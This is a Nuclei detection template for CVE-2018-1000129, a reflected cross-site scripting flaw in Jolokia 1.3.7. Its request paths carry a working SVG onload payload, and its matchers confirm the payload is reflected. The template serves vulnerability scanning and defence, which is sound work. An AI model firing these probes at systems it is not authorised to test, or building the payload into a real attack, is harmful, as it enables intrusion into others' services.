nuclei-templates/cves/2018/CVE-2018-1000129.yaml

50 lines
1.5 KiB
YAML

id: CVE-2018-1000129
info:
name: Jolokia 1.3.7 - Cross-Site Scripting
author: mavericknerd,0h1in9e,daffainfo
severity: medium
description: |
Jolokia 1.3.7 is vulnerable to cross-site scripting in the HTTP servlet and allows an attacker to execute malicious JavaScript in the victim's browser.
reference:
- https://jolokia.org/#Security_fixes_with_1.5.0
- https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
- https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
- https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000129
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-1000129
cwe-id: CWE-79
tags: cve,cve2018,jolokia,xss
requests:
- method: GET
path:
- "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
- "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<svg onload=alert(document.domain)>"
- "java.lang.IllegalArgumentException"
- "No type with name"
condition: and
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/08/18